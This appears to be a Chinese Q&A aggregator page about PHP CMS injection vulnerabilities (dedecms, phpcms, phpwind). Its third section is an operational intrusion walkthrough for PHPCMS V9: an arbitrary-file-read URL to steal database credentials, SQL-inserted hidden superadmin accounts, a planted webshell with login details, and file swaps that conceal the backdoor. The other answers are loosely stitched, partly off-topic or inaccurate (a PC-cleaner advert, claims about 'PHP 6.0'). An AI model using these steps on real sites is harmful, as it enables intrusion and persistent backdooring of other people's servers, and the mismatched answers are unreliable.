本文目录一览:
- 1、dedecms recommend.php sql注入漏洞怎么弄
- 2、用什么工具检测php网站是否存在注入漏洞?
- 3、服务器装什么软件 phpcms注入漏洞
- 4、phpwind9.x和8.7XSS注入以及管理后台脚本注入漏洞
- 5、php + mysql 检测到注入漏洞,如何注入脚本删除数据
- 6、如何修复php 5.3.11之前版本存在多个安全漏洞
dedecms recommend.php sql注入漏洞怎么弄
按我说的试试
可以用腾讯电脑管家进行全盘检查,他有智能修复功能
打开腾讯电脑管家——工具箱——漏洞修复
如果它提示系统漏洞要修复,那就是应该要修复的 有的漏洞不用修复他就会忽所以不必在意!
用什么工具检测php网站是否存在注入漏洞?
PHP的安全性现在是越来越好了PHP6。0版本都把存在的SQL漏洞都解决了
但是为了安全起见还是应该做安全检测
检测方法:SQL 注入法 、脚本代码、参数传递等方法 具体情况参看PHP官方网站 安全篇章
服务器装什么软件 phpcms注入漏洞
本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)
1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。
例如将data.txt放置在yun.baidu.com/j0192/data.txt
2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞)。
/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php
3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号
username字段:admn
password字段:10203d4623c1957d041818196ff9822a
encrypt 字段:bGV22e
issuper 字段: 1
4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。
用户名:admn
密码:123456
5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。
6、打开ifeng.com/caches/caches_template/default/wap/data.class.php
用户名:admin
密码:admin
7、隐藏新增加的管理员。
通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。
8、隐藏新增加的关联链接
通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))
9、将目标网站的漏洞修复,以防其他黑客入侵。
通过木马脚本上传替换/phpcms/modules/search/index.php
防黑参考:
1、关闭数据库远程访问。
2、静态文件及附件等文件目录禁止执行权限。
3、脚本文件目录禁止写权限。
4、系统后台等重要目录限制IP访问。
5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。
phpwind9.x和8.7XSS注入以及管理后台脚本注入漏洞
漏洞描述:
phpwind近期公布了2处安全漏洞,分别是富文本编辑器发帖的xss注入(受影响版本8.7、9.X)以及管理后台添加新用户时的脚本注入(受影响版本8.7)。
影响版本:
phpwind 9.x以及8.7,8.7.1
漏洞等级:
高危
修复建议:
1、安装官方最新补丁,官方补丁:
2、添加网站至云观测,及时了解网站组件突发/0day漏洞。
php + mysql 检测到注入漏洞,如何注入脚本删除数据
同一句语句里是不允许出现你这种格式的
如果你是有两条语句需要依次运行,那你可以用分号隔离。
比如:
insert into article_tmp select * from article;
delete from article;
不过你这两句语句有严重的逻辑性问题
delete from article;这句已经把article表里的数据都删了。你紧接着要select * from article,那你返回的肯定是空值,都被你前一句删了。
如何修复php 5.3.11之前版本存在多个安全漏洞
打开腾讯电脑管家——工具箱——修复漏洞,进行漏洞扫描和修复。
建议设置开启自动修复漏洞功能,开启后,电脑管家可以在发现高危漏洞(仅包括高危漏洞,不包括其它漏洞)时,第一时间自动进行修复,无需用户参与,最大程度保证用户电脑安全。尤其适合老人、小孩或计算机初级水平用户使用。开启方式如下:进入电脑管家“修复漏洞”模块—“设置”,点击开启自动修复漏洞即可。